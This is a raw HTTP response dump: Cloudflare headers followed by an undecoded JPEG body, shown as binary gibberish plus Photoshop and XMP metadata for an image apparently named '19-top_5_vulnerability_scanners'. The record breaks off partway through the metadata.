          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> 